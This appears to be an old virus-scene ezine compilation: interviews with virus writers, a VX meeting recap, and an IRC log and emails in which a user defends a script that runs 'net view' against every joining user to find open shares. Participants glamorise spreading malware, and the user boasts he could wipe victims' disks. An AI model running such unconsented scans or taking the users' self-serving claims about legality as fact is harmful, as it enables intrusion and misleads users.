Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult.
None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not me
in person though.
Some of your viruses were pretty destructive. How do you think about that now?
I don't really think anything about it since it's all behind me. I much rather live in the present than in the past.
Do you think the VX scene has changed a lot in all those years and do you think it was better then or now?
I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though not
really qualified to make such a comparison.
However, I don't really think you can compare things now and then, if a person starts writing viruses now, he might
fancy the scene as much I did back in 1993.
What do you think about all the Internet related viruses now and do you think there will be much more of them?
Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see more
virus-like programs circulating on the net in the future.
Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet
(un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amount
of time.
I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for me
and most other Immortal Riot guys is nowadays strictly business.
Everyone who deserves it. Further information about this can be read in our ezines called Insane Reality, which can all be
found at our site located at http://www.coderz.net/ImmortalRiot.
Curiosity, I think. I'm a very curious person about pretty much everything.
How important was virus writing for you?
Compared with what? Viruswriting was a hobby, the scene was our playground and viruswriting the ticket to
acceptance.
Did you base your viruses or virus payloads on real life issues?
I based some names from real life and I got motivation from real life. Everything is about real life issues in one way or
another.
I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scrolling all over his
monitor and later became a very good coder and an Immortal Riot member.
I work with computers, but in my spare time? Maybe an hour a week, to pay bills, write emails to friends and
ex-girlfriends and of course to annoy people with SMS :).
Greets goes to everyone who ever has been mentioned in a positive manner in Insane Reality and of course to all of
Immortal Riot. Special greets must go to Metal Militia.
You're welcome.
Interview with Del Armg0/MATRiX
Interviewer: EXE-Gency
Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.)
I'm 27, lots of girls and one of my nicks in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lots of
hobbies (vx, phreak, short-wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happy
when i'm learning in fact ;) Some of my favorite films are "Eraserhead", "CryingFreeman", "Buffet Froid", ... And i
luv music-bands like "stereolab", "gong", "bauhaus", ... and many more !
lots of ppl have asked me about it... it's "simply" a name from an AD&D campaign (during 6 years!), there was a
character i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famous
Martial Drow family, and a very fun game, so... i kept the name.
Have you ever had any previous identities in the computer underground?
nop, i've been known as Del_Armg0 since i started, but it's true that for some viral experiences i sometimes use another
nick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes.
I've started on an Amstrad cpc 464, and a thomson MO5 !!! Was really shit but really fun. After that i met the Atari
world, and it was a great moment. Atari 520/1040 ST was really great. And in 1996, i bought a PC under windows...
humm no comment!
I've a first 'puter with Win95, a 486 with a russian Dos (a graphic Dos) called Pts-Dos 6.70 and Win 3.1, i like it a lot.
And i'm still using an Atari 1040 (Tos). At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure it
will be a great OS for Vx ;)
How and when did you first discover the computer underground?
Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... and
it's easy to find evil on the Net ;]
I've started coding to make viruses, but i guess the first idea to make a virus came from the first virus i discovered when i
was younger, it was really new. And lots of hype was made around it. It was a Cpc virus, but i've forgotten the name, the
fascination is always here.. Probably some movies like "Wargames" or "Tron" are important in the story...
Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.)
Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". Phone network is full of marvellous things...
and i'm lucky, i'm now working in phone network. Hacking is cool, but sometimes too much full of "big-EGO-
people", so i prefer try it alone.
Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drug, phreak, vx, ... it's just
fun life). But why are all cool things of life illegal !!!?¿
Do the laws in your country make writing viruses illegal and have you had any trouble with the law in your country?
Yes, laws here are very bad for H/P/V; i've never been busted and i hope i won't be! But i'm sometimes tired of being
paranoid when i'm connected... (proxys, wingates and other anonymisers...). Sabia is probably the worst spreading i
did, and my ISP left me.. arrgghhhh! ... but ..but Viva phone S.E. ;)
Yep, some of them know about it, but really few. It's a bad idea to talk about it because when u send a mail to your
friend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so...
I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Viruses
are artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, a
destructive program is not really a virus. A virus must spread and spread, so why kill the host and kill itself at the
same time ?
How did you get involved with the Matrix virus group?
mort was a good electronic friend, some groups asked me to join, but i was not interested, i said it to mort, and so
he asked me to join MATRiX, this time i said "ok".
Does the Matrix group concern themselves with virus programming only or do they have an interest in other
underground topics?
Actually MATRiX concerns only virus coding, but i hope i could introduce some other subjects like phreaking, trojans,
hacking, ...
Nop, and i've never thought of being in a group, i liked to be alone; but it could be a good experience (and mort is a
really good friend).
Why did you start learning to program? Was it because you wanted to write computer viruses.
i've started to program in 1998 with Delphi, and yes i've started learning to program to write viruses/trojans. So fast
i've learned asm, i've still to learn asm32 (i've started). I like a lot to learn some toys or silly languages like VB, VDscript,
batch, rebol, javascript,...
Delphi/Pascal, Asm/Asm32 for serious coding; Vba/Vbs, html/wml, and some other scripting languages, for silly
things. I find Rebol very interesting too (31 platforms !!) I like Toys like PcomP, VDS, M:POSTER,...
Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 were great worms at this time, they were really my first, and they
had some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' of the silly
splash screen.
I guess 29A is one of the most prolific and original groups of the present time. Perhaps even too present.. i liked
Phalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool
Which individual programmers (both past and present) do you value most highly?
Wooo, really hard to answer! But i like legends like DarkAvenger and stories like that. Bulgarian Myth is great. The
texts about it are nice novels.
Really a lot! I read almost all E-zines about Vx and Phreaking, i read some french Hacking zines too.
(www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps the
best (after MATRiX zine, of course:)
What do you think of the virus scene? (Both in general and in your own country.)
I know well the vx trading scene, and there is too much politics... About the vx scene, it's a cool place, but too many
young people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, but
i'm sometimes a bit away from the vx scene.
How has the underground scene changed since you first entered?
The scene has changed yes, but the scene changed so fast.
Guys appear, disappear,... But since the beginning i've kept some good electronic friends in the vx scene, it's enough for
me. (booohh Phage!;(
It will depend on different things, like the OS. If Linux becomes the main OS it will be a revolution for vxers, probably the
scene will be totally changed. And the more networks and networking applications appear, the more worms come too. So the
future of viruses is more in the hands of mass ppl than in our hands.
A Worm of course :), Joke! But i really believe that the future of the virus is in the worm properties. The next
generation of viral code must have abilities to infect the new hardware (like mobile phones) and spread using new
protocols. WAP networks, GPRS and UMTS protocols will be used by phones and tiny computers, the virus will have to
use worm techniques to spread between phones, computers and other palm & psion. I like the idea of an Autonomous
Mobile Cyber Weapon (AMCW) too. The perfect virus will have to use main worm features, will know and find its
target and infect files traded by network users (like pictures, ...yes my dream would be to infect .jpg :)
What advice would you give to newbies entering the virus scene?
Download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on IRC to meet
some ppl and code, code, code, ... A good thing is really to learn the maximum possible things: learn some languages,
learn about OSes, learn about protocols, learn about people, learn, learn, learn, ...
It depends really on the newbie; learning Asm first is good to learn some universal maths/coding theories, and after Asm
all other languages seem easy, hehehe. But the better thing to do is to try them all, to learn again and again. All
languages are good if you really know that language; the hardest is perhaps to find THE language.
I guess not, lots of things have been said. And I'm not somebody very talkative (gossipy?) cya.
Any greets?
Yes a lot!!! Greets to: Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov,
ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe, Roadkill,
Zulu, Mist, Urgo32, me, hashish, all!
Sure !
mailto: delly@fr.st
http://www.delly.fr.st
http://www.coderz.net/matrix
VX meeting 2000 in Czech Republic:
Opinions of a few VXers
Interviewer: Gigabyte
First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. While
AVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun and
giving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno,
Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over the
city. Do we still remember anything? I sure do! Let's see what the guys have to say..
GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer.
I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard for
some days.
Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you don't think so?
Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It was
a great time for me. One of the best in my life...
GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and we
were smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny.
Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, got
absolutely stoned and drunk, hehe.
Ratter: yeah i missed darkman there. and other ppl that do VXing
How often did you have a hangover?
GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I was
wrong, eh Benny? ;-))))
Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :)
Ratter: I don't have hangover after weed :) and i didn't drink a lot
Kevin & Kell
Bill Holbrook
What follows is the result of a run-in I had with a seriously stupid
IRCop of Undernet. If you, the reader, don't know or understand shared
drives and net.exe, this entire file will be one boring read for you.
For the rest of us, it's funny as hell... Definitely a keeper if I do say
so myself :]
<CiCi> why?
<Raid> I don't think you quite understand what you erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was
there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
<Raid> I told him if I was a jerk as he said, I would have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody; even you.
<CiCi> ok, let me go read these logs again with that in mind, brb
<Raid> So when I'm contacted by the authorities, (they already know about this serious
security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had
this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider
that a threat, lamer.
<Raid> Are you going to use the entire log, or out of context?
<Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
<Raid> then anybody (even you) could access his entire system.
<Raid> and use it like you were sitting at the keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no
idea you didn't know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, every time you reboot; unless you manually set it otherwise, drive c: is
shared as open, with admin rights, no password.
<Raid> listen, if you really don't believe me, You can ask anybody you trust with computer
knowledge to checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrassment rather
<Raid> it's not normal for an admin to not understand shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and if they don't check it out first.
<Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing, but you were threatening and that's not
right
<Raid> He didn't believe me when I told him YOU were an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me when you first met me
<Raid> I had to /whois and show him your "is an ircop" thingie.
<Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that
point. he was mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of context) that if I was a jerk, I could
easily format /u his hard disk, or even quicker, nuke his fat or registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you.
I'm perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like undernet does for open proxies.
<Raid> You might want to recommend undernet do this scan hehe
<Raid> it's even more serious to a user's data than an open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about something, Check it out before accusing
me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
<CiCi> the only things we look for are things that damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as yours done to all guests
<Raid> if they all knew about the bug in windows, I bet you they would.
<CiCi> now, I'm tired of you insulting me
<Raid> I'm sure some of you ircops login with windows boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops i've talked to.
<Raid> I realize I may sound like a smartass; But it's seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said to him?
<CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off. I decided to tell him in open channel
(I was writing /msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the problem, I don't know, but I do know
that what you did was not good
<Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before
his eyes, and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically
something a kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the second they were told an open share was
found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could take advantage?
<CiCi> would have been more civil if you hadn't tried to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back did he?
<Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise
one... So I cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and most of us are mature enough not to
have a temper fit and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is
check ANY search engine (or even Microsoft) for the fix for this problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection
or map anything.
<Raid> it's no more intrusive than proxy scans. Users don't even notice it, and it doesn't
show up as an attack on any firewalls either; because it isn't.
<CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a chance.
<Raid> and goodnight n stuff.
You were removed because you were actively scanning others' machines as they joined the channel, invading those machines when possible, and pasting their private chat logs back to them. You have been asked to stop doing this for over 24 hours and the requests were met with an attitude from you that you were very much entitled to invade and compromise machines when someone irritated you on Undernet. Don't think for one minute that this is either legal or appreciated using Undernet bandwidth. If this is repeated by you when your gline expires, expect another one.
Ci_Ci
Admin. Dallas.TX.US.Undernet.Org
> with an attitude from you that you were very much
> entitled to invade and compromise machines when
I've also heard from others (and I'm sure they have
logs) that you've been abusing your Oline for some
time now. glining people for channel matters; Of which
you have no status in. Just because you "hangout" in a
channel doesn't give you the right to gline people
from the entire undernet; That's what the channel has
ops for.
__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/
> Gator
Then explain how you were pasting back private chat logs that Chaplain had with others :/ When I first chatted with you about this, you told me you wouldn't have done anything to him but because he was a smart alec, or something of that nature, you thought you were within your right to do this. Just because you CAN hit a child doesn't mean it's the proper thing to do and most of our undernet guests are virtual children. We don't take advantage of that fact.
>
>Not true. You said in channel that I was hacking (I
>have that log too) chaplain.
I'm not Chaplain. Get your people straight. There is more than one person here who has been affected by your actions and AFAIK Chaplain isn't reading this email.
I told you nothing of the sort. Once again, get your people straight. It is my understanding that Chaplain has contacted his church's attorney and that since you both live in the same state, there is merit for suit. That's all I know about that and that's all I want to know about it.
>
>Real network aware one you are... I wasn't using
>undernet bandwidth running my script...And what my
>script was doing is damn sure not illegal. Unless your
>going to tell me undernets proxy scans of me everytime
>I connect is also illegal? I didn't do anything
>different.
OK, if you weren't using undernet bandwidth, explain how you knew the IP/host information of the people you were scanning. You were scanning everyone that entered a channel on Undernet without their consent. The "consent" part is the difference between your scans and the proxy scans Undernet does. If you read the motd of most servers, you'll see that it is discussed there. If users don't want to be scanned for the most commonly abused ports being open, they are free to disconnect to Undernet. You made none of this information available to people who entered the channel and you had no permission from them to scan their machines.
Calling someone a lamer doesn't sound like my idea of nice and telling them to "consider this a threat" doesn't sound very kind either.
I don't have a personal problem with you so the rest of the above paragraph is of no concern. My problem with you was that you were sitting on Undernet scanning the machines of each person joining a channel.
>Not to
>mention the fellow you glined last night for swearing
>in a channel you don't even op in. I've got that log
>too ;p
>
>I've also heard from others (and I'm sure they have
>logs) that you've been abusing your Oline for some
>time now. glining people for channel matters; Of which
>you have no status in. Just because you "hangout" in a
>channel doesn't give you the right to gline people
>from the entire undernet; Thats what the channel has
>ops for.
>
I've carbon copied him on this as well. Gator is a very good person and does many things for Undernet that he never gets the praise he deserves. What you may not be aware of is that both Gator and I got copies of Chaplain's log files sent to abuse the day before. We both have access to the chat log in full context. We both read email sent to abuse@undernet.org
>
>The log file is kinda large; scroll down for the
>relevant info.
Many of us who work on the net do not open attachments for obvious reasons. I'm sure there is nothing malicious in your logs, but it's just a rule of thumb we use to avoid problems.
The reason I got involved in this was because you were not only scanning people without permission as they entered that channel, but also because you were using the information from those scans to threaten people when they did not behave in the manner you desired. If you have indeed stopped scanning people as they enter a channel, you have solved the problem that was my issue.
CiCi
From John Grahms Sun Sep 10 20:58:49 2000
Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT
Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <lmaurer@iadfw.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 10980
> Then explain how you were pasting back private chat
> logs that Chaplain had with others :/ When I first
You care to back this up with some Evidence CiCi? Any
logs created by my machine are available for my use;
You don't have any say with that I do with material I
log. You don't own not one single file present on my
machine, and that includes logs of us chatting. I log
for a reason, and this my dear is one of them.
> this, you told me you wouldn't have done anything to
> him but because he was a smart alec, or something of
> that nature, you thought you were within your right
> to do this.
> I told you nothing of the sort. Once again, get your
> people straight.
> My problem with you was that you were sitting on
> Undernet scanning the machines of each person joining
> a channel.
> Once again, scanning for open ports and then
> intimidating the machine owner when they say
> something you dislike borders on extortion and it's
I didn't scan for open ports. Computer lesson number 2
(seems you can't learn any other way, I am forced to
be rude) my script sent net view ''$ip one time, which
attempts to connect to port 139; For Netbios
information, NOT OOB nuking. I already know this is
above you, But I'm going to explain exactly what I did
anyway; Just because it's beyond you doesn't mean
somebody else reading this email won't understand what
I'm talking about.
CiCi, You know your gline was not legit. You know it.
I know it. Why don't you apologize for doing it? It
seems like a christian thing to do.
> but also because you were using the information from
> those scans to threaten people when they did not >
behave in the manner you desired.
Regards,
Raid
Here's a copy of this kid's latest crap. I've had enough of this. Sitting in a channel and port scanning everyone who joins is not a good thing. Continuing his argument with me about it is totally stupid.
Lisa
>X-Persona: <lmaurer>
>Return-Path: <raidslam@yahoo.com>
>Received: from web1603.mail.yahoo.com from [128.11.23.203] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <lmaurer@iadfw.net> sender: <raidslam@yahoo.com> id <mP/13YKWp-0008GIP@mail.airmail.net>; Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>Received: (qmail 26157 invoked by uid 60001); 11 Sep 2000 03:58:49 -0000
>Message-ID: <20000911035849.26156.qmail@web1603.mail.yahoo.com>
>Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT
>Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
>From: John Grahms <raidslam@yahoo.com>
>Subject: Re: [Abuse] Hello
>To: "L. Maurer" <lmaurer@iadfw.net>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>
>
>--- "L. Maurer" <lmaurer@iadfw.net> wrote:
>
>> Then explain how you were pasting back private chat
>> logs that Chaplain had with others :/ When I first
>You care to back this up with some Evidence CiCi? Any
>logs created by my machine are available for my use;
>You don't have any say with that I do with material I
>log. You don't own not one single file present on my
>machine, and that includes logs of us chatting. I log
>for a reason, and this my dear is one of them.
>
>> this, you told me you wouldn't have done anything to
>> him but because he was a smart alec, or something of
>> that nature, you thought you were within your right
>> to do this.
>
>You can't tell me "don't be a smartass" to someone,
>Sorry. It's not illegal nor against undernet policy to
>treat somebody with less then perfect respect. Go
>nanny somebody else.
>
>> Just because you CAN hit a child doesn't mean
>> it's the proper thing to do and most of our
>> undernet guests are virtual children. We don't take
>> advantage of that fact.
>
>I didn't hit anybody. And I'm getting pretty sick and
>tired of your bullshit excuses CiCi. Admit it, You
>don't like me, so You gline me.
>
>> I'm not Chaplain. Get your people straight. There
>> is more than one person here who has been effected
>> by your actions and AFAIK Chaplain isn't reading
>> this email.
>
>You wanna back this one up as well Please? I like
>evidence, I'm a strong believer in it. The more BS you
>talk (which btw, you can't actually backup) the less
>respect I have for you.
>
>> I told you nothing of the sort. Once again, get your
>> people straight.
>
>OH YES, Yes you did. I have that Log at work; I shall
>retrieve it. You made it perfectly clear in your own
>words that I had been reported (laugh laugh) to the
>authorities for my "hacking" chaplain.
>
>> It is my understanding that Chaplain has contacted
>> his church's attorney and that since you both live
>> in the same state, there is merit for suit.
>
>Cici, I've been as patient and forgiving as I'm going
>to be. The rest of this email may be rude; I'm not
>trying any longer to make it not be. Had you looked at
>all on the laws governing this state; Chaplain hasn't
>got a pot to piss in. However, I can and will win a
>counter suit; Although I know churches don't have alot
>of money, I'll counter sue for the point of it.
>> OK, if you weren't using undernet bandwidth, explain
>> how you knew the IP/host information of the people
>*yawn* Remember when I said I had lost my patience?
>Well, get ready for a computer lesson; Seems damn time
>somebody told you. It doesn't use undernet bandwidth
>to /whois someone, nor does it really do anything when
>you /dns somebody. My script didn't use any of your
>precious bandwidth, because (oh dense one) it
>establishes direct connection via a socket call. Shall
>I get any more technical, or can you understand this?
>
>
>> their consent. The
>> "consent" part is the difference between your scans
>> and the proxy scans Undernet does. If you read the
>> motd of most servers, you'll see that it is discussed
>> there.
>
>Indeed I have, and guess what. If somebody really
>wanted to "sue" undernet for scanning them, your motd
>wouldn't do shit for you. Know why? Because it's like
>a shrinkwrap software license; It won't actually hold
>up in court. But it sounds good.
>
>
>> to Undernet. You made
>> none of this information available to people who
>> entered the channel and you had no permission from
>> them to scan their machines.
>
>Technically, I didn't scan anybody. Second, I don't
>actually need their permission to scan them. It's not
>illegal to port scan any machine you desire. It
>becomes illegal if you attempt to gain unauthorized
>entry into the machine once you have scanned It.
>scanning is like knocking on the door or calling
>somebodys house to see if there home. For an ircop,
>You really don't know much about the internet, nor the
>laws governing it.
>
>> Calling someone a lamer doesn't sound like my idea
>> of nice and telling them to "consider this a
>> threat" doesn't sound very kind either.
>
>Still quoting me out of context? :) Why don't you
>email us a copy of the entire log cici, so we can put
>it in the proper context. I was nice enough to tell
>him he had a problem to begin with; You seem to have a
>very hard time with this very very simple concept. I
>really don't know what to think of you anymore. I
>already know your computer knowledge leaves much to be
>desired, and in my opinion; You aren't qualified to be
>an ircop.
>
>But lucky for you, It's not in my power to make those
>decisions.
>
>> I don't have a personal problem with you so the rest
>> of the above paragraph is of no concern.
>
>I'm not letting you wiggle out of this CiCi. Glining
>me went a little too far. According to the wonderful
>christian log, You glined me after I had already told
>you (after your attempt to start shit with me when I
>joined) that the script was no longer scanning
>anybody. I set away to get some food, then you glined
>me. You can't get out of it. That's how it went down,
>and you know it.
>
>
>> My problem with you was that you were sitting on
>> Undernet scanning the machines of each person joining
>> a channel.
>
>I'm an op in several security related channels, It is
>our channels policy to scan all visitors; or they are
>not welcome. My script does not currently distinguish
>between only those channels and all channels I might
>be visiting in. However, it is to be said; You and
>Chaplain are the ONLY people I've scanned and informed
>they had a problem that weren't happy to know. They
>say I suppose that ignorance is bliss, but in the
>computer age; this will kill you.
>
>Your problem with me is a personal one, Otherwise you
>would not have glined me yesterday; As you knew well
>infact that I was no longer scanning anybody (As I had
>told you). How do you defend that gline anyway CiCi?
>What undernet rule at the time was I in violation of?
>Please, enlighten me :)
>
>> I was told yesterday that I had been accepted as an
>> Op in #christian.
>
>I don't know. I was speaking with the channel
>administrator; He assured me I'd have no further
>problems from you. :) Whether your op status is
>affected isn't my concern, I just don't want any more
>hassle from you. I know you've overstepped your
>authority, and you know it.
>
>> I have now declined that offer until this matter is
>> settled.
>
>The matter can easily be settled, Don't gline me for
>bullshit, and apologize for the bullshit gline you did
>set on me, and I'll drop the entire issue.
>
>> Once again, scanning for open ports and then
>> intimidating the machine owner when they say
>> something you dislike borders on extortion and it's
>
>I didn't scan for open ports. Computer lesson number 2
>(seems you can't learn any other way, I am forced to
>be rude) my script sent net view \\$ip one time, which
>attempts to connect to port 139; For Netbios
>information, NOT OOB nuking. I already know this is
>above you, But I'm going to explain exactly what I did
>anyway; Just because it's beyond you doesn't mean
>somebody else reading this email won't understand what
>I'm talking about.
>
>And again, I must ask you to provide proof that I was
>intimidating anybody. Sigh, I lose more and more
>respect for you with each email methinks. I don't
>extort anybody.
>
>> If you weren't on undernet, you wouldn't know who
>> joined the channels here.
>
>I've been a regular on undernet for several years.
>I've never had a problem like this before. And it's
>not really a problem... You had no valid reason to
>gline me, and you did; And I'm going to press this
>issue until it's resolved. If that means I have to
>make you look like a total idiot with regard to
>computers, I'll do so (mind you, it wouldn't take any
>effort; These emails and the logs I have show it
>without a doubt). A wrong must be righted.
>
>CiCi, You know your gline was not legit. You know it.
>I know it. Why don't you apologize for doing it? It
>seems like a christian thing to do.
>
>> I've carbon copied him on this as well. Gator is a
>> very good person and does many things for Undernet
>> that he never gets praise he deserves.
>
>I've known gator for some time, he knows some
>associates I used to frequent with. WarBlade and
>crew...
>
>> What you may not be aware of is that both Gator
>> and I got copies of Chaplain's log files sent to
>> abuse the day before. We both have access to the
>> chat
>
>Then why are you still quoting it out of context? I
>didn't do anything illegal to Chaplain; I may have
>saved him some serious downtime. I do admit tho, If I
>had known I'd be in this BS for doing it, I'd have not
>said not one word. In the future, I'll keep my mouth
>shut. Ignorance is bliss, right? :)
>
>> Many of us who work on the net do not open
>> attachments for obvious reasons.
>
>A LOG file is a text file, opening it in notepad will
>not infect you. Please don't force me to give you a
>lesson in virus terminology. I have very good
>withstanding credentials in that field. How many
>"scriptkiddys" (that's what you called me once right?
>;p) do you know in Rolling Stone magazine? :-)
>
>> I'm sure there is nothing malicious in your logs,
>> but it's just a rule of thumb we use to avoid
>>problems.
>
>Lack of education creates rules that are sometimes not
>necessary.
>
>> The reason I got involved in this was because you
>> were not only scanning people without permission as
>> they entered that channel
>
>(a) I don't need their permission. and (b) I don't
>even have to tell them either beforehand or after that
>I scanned them. And I don't scan people.
>
>> but also because you were using the information from
>> those scans to threaten people when they did not >
>behave in the manner you desired.
>
>Nice try! I didn't threaten anybody; I helped his
>sorry ass out. I didn't use any of the information in
>any illegal nor immoral manner. I did a christian
>thing and told the bastard he had a problem. I should
>have let him suffer with it. Stupidity seems to be
>incurable.
>
>> If you have indeed stopped
>> scanning people as they enter a channel, you have
>> solved the problem that was my issue.
>
>Your "issue" isn't of any concern to me anymore. Your
>gline and abuse of oline is. You glined me after I
>already told you I stopped, that's just plain outright
>wrong. I wasn't doing anything against undernet policy
>to begin with, but to gline me after I already said I
>wasn't doing it anymore is bullshit. Especially since
>you didn't gline me on entry, you said a wiseass
>comment about me in open channel. When I responded I
>was glined shortly thereafter. And I bet without a
>doubt; it had nothing whatsoever to do with chaplain.
>I strongly suspect you didn't like my response to your
>wiseass comment.
>
>If there's a lesson to be learned here, it's to allow
>the stupid and ignorant to remain that way; It's for
>the best.
>
>Regards,
>Raid
>
>PS: I didn't have time to enter gators email; I'm
>trusting you to send him this intact... See if you can
>do that. Ok?
>
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>
From John Grahms Mon Sep 11 05:51:48 2000
Received: from [205.245.105.248] by web1609.mail.yahoo.com; Mon, 11 Sep 2000 05:51:48 PDT
Date: Mon, 11 Sep 2000 05:51:48 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <lmaurer@iadfw.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 813
Regards,
Raid
Hi Lisa,
Regards,
Raid
-- I don't remember when this took place or how it really fits into my
article. LoL. Ah well.
These text files comprise the war with Undernet IRCop CiCi
so far. As you can see by reading the files yourself, She isn't
qualified for her position. She be way too dumb.